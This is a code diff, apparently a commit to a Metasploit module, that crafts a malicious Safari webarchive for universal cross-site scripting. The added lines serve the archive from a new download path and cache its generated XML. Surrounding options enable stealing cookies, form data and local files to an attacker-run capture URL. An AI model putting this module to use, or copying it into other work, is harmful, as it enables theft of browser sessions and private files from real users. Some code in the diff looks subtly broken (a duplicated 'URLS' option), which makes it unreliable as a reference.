@@ -50,6 +50,8 @@ def initialize(info = {})
50
50
OptString . new ( 'FILENAME' , [ true , 'The file name.' , 'msf.webarchive' ] ) ,
51
51
OptString . new ( 'URLS' , [ true , 'A space-delimited list of URLs to UXSS (eg http//browserscan.rapid7.com/' ] ) ,
52
52
OptString . new ( 'URIPATH' , [ false , 'The URI to receive the UXSS\'ed data' , '/grab' ] ) ,
53
+ OptString . new ( 'DOWNLOAD_PATH' , [ true , 'The path to download the webarhive.' , '/msf.webarchive' ] ) ,
54
+ OptString . new ( 'URLS' , [ true , 'The URLs to steal cookie and form data from.' , '' ] ) ,
53
55
OptString . new ( 'FILE_URLS' , [ false , 'Additional file:// URLs to steal.' , '' ] ) ,
54
56
OptBool . new ( 'STEAL_COOKIES' , [ true , "Enable cookie stealing." , true ] ) ,
55
57
OptBool . new ( 'STEAL_FILES' , [ true , "Enable local file stealing." , true ] ) ,
@@ -143,7 +145,7 @@ def start_http(opts={})
143
145
} . update ( opts [ 'Uri' ] || { } )
144
146
145
147
proto = ( datastore [ "SSL" ] ? "https" : "http" )
146
- print_status ( "Using URL: #{ proto } ://#{ opts [ 'ServerHost' ] } :#{ opts [ 'ServerPort' ] } #{ uopts [ 'Path' ] } " )
148
+ print_status ( "Data capture URL: #{ proto } ://#{ opts [ 'ServerHost' ] } :#{ opts [ 'ServerPort' ] } #{ uopts [ 'Path' ] } " )
147
149
148
150
if ( opts [ 'ServerHost' ] == '0.0.0.0' )
149
151
print_status ( " Local IP: #{ proto } ://#{ Rex ::Socket . source_address ( '1.2.3.4' ) } :#{ opts [ 'ServerPort' ] } #{ uopts [ 'Path' ] } " )
@@ -153,6 +155,20 @@ def start_http(opts={})
153
155
@service_path = uopts [ 'Path' ]
154
156
@http_service . add_resource ( uopts [ 'Path' ] , uopts )
155
157
158
+ # Add path to download
159
+ uopts = {
160
+ 'Proc' => Proc . new { |cli , req |
161
+ resp = Rex ::Proto ::Http ::Response ::OK . new
162
+ resp [ 'Content-Type' ] = 'application/x-webarchive'
163
+ resp . body = @xml . to_s
164
+ cli . send_response resp
165
+ } ,
166
+ 'Path' => webarchive_download_url
167
+ } . update ( opts [ 'Uri' ] || { } )
168
+ @http_service . add_resource ( webarchive_download_url , uopts )
169
+
170
+ print_status ( "Download URL: #{ proto } ://#{ opts [ 'ServerHost' ] } :#{ opts [ 'ServerPort' ] } #{ webarchive_download_url } " )
171
+
156
172
# As long as we have the http_service object, we will keep the ftp server alive
157
173
while @http_service
158
174
select ( nil , nil , nil , 1 )
@@ -176,9 +192,10 @@ def on_request_uri(cli, request)
176
192
177
193
# @return [String] contents of webarchive as an XML document
178
194
def webarchive_xml
179
- xml = webarchive_header
180
- urls . each_with_index { |url , idx | xml << webarchive_iframe ( url , idx ) }
181
- xml << webarchive_footer
195
+ return @xml if not @xml . nil? # only compute xml once
196
+ @xml = webarchive_header
197
+ urls . each_with_index { |url , idx | @xml << webarchive_iframe ( url , idx ) }
198
+ @xml << webarchive_footer
182
199
end
183
200
184
201
# @return [String] the first chunk of the webarchive file, containing the WebMainResource
@@ -288,8 +305,9 @@ def webarchive_footer
288
305
# NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
289
306
# [a encodeObject:response forKey:@"WebResourceResponse"];
290
307
def web_response_xml ( script )
291
- # this is a binary plist, but im too lazy to write a real encoder.
292
- # ripped this straight out of a safari webarchive save.
308
+ # this is a serialized NSHTTPResponse, i'm too lazy to write a
309
+ # real encoder so yay lets use string interpolation.
310
+ # ripped this straight out of a webarchive save
293
311
script [ 'content-length' ] = script [ :body ] . length
294
312
whitelist = %w( content-type content-length date etag
295
313
Last-Modified cache-control expires )
@@ -711,7 +729,7 @@ def all_script_urls(pages)
711
729
end
712
730
end
713
731
714
- # @return [Array<Array<String >>] list of URLs for remote javascripts that are cacheable
732
+ # @return [Array<Array<Hash >>] list of headers returned by cacheabke remote javascripts
715
733
def find_cached_scripts
716
734
cached_scripts = all_script_urls ( urls ) . each_with_index . map do |urls_for_site , i |
717
735
begin
@@ -780,6 +798,11 @@ def backend_url
780
798
"#{ proto } ://#{ myhost } #{ port_str } "
781
799
end
782
800
801
+ # @return [String] URL that serves the malicious webarchive
802
+ def webarchive_download_url
803
+ datastore [ "DOWNLOAD_PATH" ]
804
+ end
805
+
783
806
# @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen
784
807
# via the FILE_URLS module option.
785
808
def interesting_file_urls
0 commit comments